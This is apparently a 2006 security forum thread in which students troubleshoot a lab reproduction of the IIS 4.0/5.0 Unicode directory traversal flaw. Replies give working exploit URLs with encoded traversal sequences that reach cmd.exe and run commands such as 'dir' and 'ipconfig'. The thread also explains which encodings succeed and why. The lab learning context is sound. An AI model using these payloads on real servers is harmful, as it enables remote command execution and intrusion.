|
Title: pentest: IIS 4.0 directory traversal ERROR 500 Post by: paddy on August 18, 2006, 04:07:24 AM my classmates and i are simulating a directory traversal attack on an NT box we set up in our lab with IIS 4.0
Problem is, when entering the actual directory traversal strings in the browser, we get a 500 Internal Server Error. example strings are as follows: http://testserverIP/samples/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe http://testserverIP/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe since we know that the path exists and that cmd.exe exists, could anyone give me an idea as to what is possibly preventing us from successfully recreating the said exploit? any help would be much appreciated. thanks. :) Title: Re: pentest: IIS 4.0 directory traversal ERROR 500 Post by: jimbob on August 18, 2006, 04:11:20 AM Hi,
I don't really know IIS all that well so I'm going to be a little faceious. Have you read the logs? There ought to be an error message explaining the HTTP 500 status codes. Are you sure your version of IIS is vulnerable to that particular attack? Are you sure the attack has not succeeded? Regards, Jim Title: Re: pentest: IIS 4.0 directory traversal ERROR 500 Post by: dean on August 18, 2006, 08:35:48 AM Hi Paddy,
Have a look at the following. It covers the IIS Extended Unicode Directory Traversal Vulnerability. http://www.securityfocus.com/bid/1806/exploit Your paths & unicode encoding look correct but you have not told cmd.exe what command to run. Append this to your URLs: /cmd.exe?/c+ipconfig HTH, Dean Title: Re: pentest: IIS 4.0 directory traversal ERROR 500 Post by: paddy on August 18, 2006, 11:04:16 PM thanks guys.
hmmm... it seems that our testbox was vulnerable to only certain extended unicode combinations. (like %c1%1c and %c1%9c, for example) anyone have any ideas why? I will also look further into this. BTW, i used the ever popular "cmd.exe?/c+dir" thing... just neglected to include it in the previous post. (sorry 'bout that, Dean) :) in the meantime, we're still tinkering with the testbox. thanks again, guys! ;D Title: Re: pentest: IIS 4.0 directory traversal ERROR 500 Post by: LSOChris on August 19, 2006, 01:32:47 PM probably because its windows NT, a 2k box should be vulnerable to more combinations of the unicode attack.
Title: Re: pentest: IIS 4.0 directory traversal ERROR 500 Post by: dean on August 19, 2006, 01:42:39 PM Hi Paddy,
%c1%1c is the Chinese representation of '\' in Unicode. %c1%9c is the English representation of '\' So your IIS server (English, I assume) :) should only be vulnerable to the english version. %c0%af should also work on your server. Tested the following on a Win2k server test box I have: Successful: http://ipaddr/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ http://ipaddr/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ Failed: http://ipaddr/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Also, make sure that the directory (eg: /scripts/) is marked as executeable otherwise the attack will fail. Cheers, Dean Title: Re: pentest: IIS 4.0 directory traversal ERROR 500 Post by: paddy on August 21, 2006, 10:27:13 PM roger that. ;)
thanks again, guys! BTW, we're having fun tinkering with the box.
Powered by SMF 1.1.18 |
SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com |